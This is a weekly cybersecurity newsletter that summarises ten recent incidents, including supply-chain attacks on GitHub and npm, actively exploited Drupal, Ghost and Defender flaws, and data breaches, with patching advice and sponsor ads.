May 29 2026
Welcome to Gone Phishing, where the only thing getting hooked is bad actors. No bots, no fluff, just the week's most dangerous catches. 🎣
Most AI creative tools fall short for one simple reason. You can generate tons of ads, but they aren’t up to par.
Refining copy, adjusting layouts, or nudging a CTA into place shouldn’t require rewriting prompts over and over. It slows teams down and breaks the creative process.
With Hightouch Ad Studio, AI gets you 90% of the way there. For the final 10%, use a built-in editor to quickly refine copy and design, or export directly to Figma for seamless collaboration with your design team.
Move faster without losing control. Every ad, exactly how you want it.
1. 'Megalodon' Supply Chain Attack Backdoors 5,500+ GitHub Repos An automated campaign pushed 5,718 malicious commits to 5,561 GitHub repos in ~6 hours on May 18, injecting GitHub Actions workflows that exfiltrate CI secrets, cloud credentials, SSH keys and OIDC tokens. Forged "ci-bot"/"build-bot" identities disguised it as routine maintenance; it spread downstream via poisoned packages like @tiledesk/tiledesk. Audit workflow changes, rotate CI/CD secrets, pin/verify Actions. Read more → Dark Reading
2. Carnival Confirms Data Breach Affecting Nearly 6 Million People Carnival is notifying ~5.99M people that names, addresses, DOBs, contact details and government IDs were stolen after an employee account was socially engineered on April 14. ShinyHunters claimed 8.7M records and leaked data in late April; notifications began May 27 with 24 months of credit monitoring. Read more → SecurityWeek
3. FBI: 'Silent Ransom Group' Sends Operatives In Person to Steal Law Firm Data The FBI warned SRG is posing as internal IT to gain remote access to U.S. law firms — and, when that fails, physically sending someone to plug in a storage device. Legal is now the 4th most-targeted ransomware sector in 2026. Brief helpdesk/reception staff and tighten USB/physical-access controls. Read more → BleepingComputer
4. Drupal Core SQL Injection (CVE-2026-9082) Under Active Attack, Added to CISA KEV A highly critical SQLi in Drupal's DB API is being exploited within 48 hours of patch; Imperva logged 15,000+ attempts on ~6,000 sites across 65 countries. PostgreSQL-backed sites only (~5% of installs) but enables data theft, privesc and RCE. CISA KEV-listed May 22, federal deadline May 29 — patch now. Read more → The Hacker News
5. Ghost CMS Flaw (CVE-2026-26980) Hijacks 700+ Sites for ClickFix A CVSS 9.4 unauthenticated SQLi in Ghost's Content API is being used to steal admin API keys and inject JS into 700+ sites — Harvard, Oxford, Auburn, DuckDuckGo among them — serving fake "verify you're human" ClickFix prompts that drop loaders and Electron malware. Upgrade to Ghost 6.19.1+ and rotate all API keys. Read more → BleepingComputer
6. Microsoft Defender Zero-Days 'UnDefend' & 'RedSun' Exploited to Blind AV Two actively exploited Defender flaws — UnDefend (CVE-2026-45498) and RedSun (CVE-2026-41091) — can be triggered remotely to crash/disable the scanning engine, killing real-time protection. Fixes ship via engine 1.1.26040.8 / 4.18.26040.7; both on CISA KEV with a June 3 deadline. Confirm Defender auto-updates applied. Read more → SecurityWeek
7. Malicious npm Package Steals Files From Claude AI's User Directory "mouse5212-super-formatter" posed as a deployment-sync utility but uploaded files from /mnt/user-data — Claude's upload/output directory — to attacker GitHub repos, reaching 676 downloads before removal. The AI-generated malware hardcoded its own GitHub token, letting OX Security trace it. AI tooling is now a supply-chain target. Read more → The Hacker News
8. Glassworm Developer Botnet Disrupted in CrowdStrike–Google–Shadowserver Takedown Researchers cut four resilient C2 channels (Solana blockchain + BitTorrent DHT) used by Glassworm, which since Oct 2025 pushed malicious VS Code/OpenVSX extensions and npm/GitHub artifacts to steal crypto wallets and dev credentials — one March wave tainted 400+ artifacts. A rare win against takedown-resistant infrastructure. Read more → BleepingComputer
9. Latin American Crews Plunder Government Citizen Data; Uruguay Leak Hits 5.8M Cybercriminals across LatAm are increasingly breaching government agencies/contractors to monetize citizen data — making public administration the region's most-breached sector — pivoting to "pure extortion" without encryption. Latest: a 5.8M-record Uruguay leak after "La Pampa Leaks" compromised an Antel-managed national identity service. Read more → Dark Reading
10. cPanel LiteSpeed Plugin Privilege-Escalation Flaw (CVE-2026-48172) Added to CISA KEV CISA added CVE-2026-48172, a privesc flaw in the LiteSpeed cPanel plugin, to KEV on May 26 on confirmed in-the-wild exploitation. Given LiteSpeed/cPanel's huge hosting footprint, it offers a path to escalate on multi-tenant web servers. Hosting providers and LiteSpeed site owners should patch and review logs. Read more → CISA
Key Themes This Week
Software supply chain is the main battleground — Megalodon's GitHub Actions poisoning, the Claude-targeting npm package, and the Glassworm takedown all centre on developer tooling/CI-CD.
The exploitation window keeps shrinking — Drupal attacked within 48h of patch, Ghost CMS and two Defender zero-days live, and multiple fresh CISA KEV additions leave little room to defer patching.
Extortion is going physical and data-only — SRG is walking into law firms; LatAm crews and ShinyHunters (Carnival) skip encryption for high-volume data theft and pure extortion.
Claude.ai is one thing. Claude Cowork with MCP connections, running agentic workflows, taking actions across your data with ungoverned skills? That is a different conversation entirely, and most security teams are not equipped to govern it.
Harmonic Security is built to secure everything Claude offers. Full browser controls for Claude.ai, deep governance over agentic MCP workflows, and real-time visibility into what Claude is doing across your organization. So your CISO can say yes to the tools your business is already demanding.
Get the guide: Securing Claude Cowork for the enterprise.
Let us know what you think.
So long and thanks for reading all the phish!
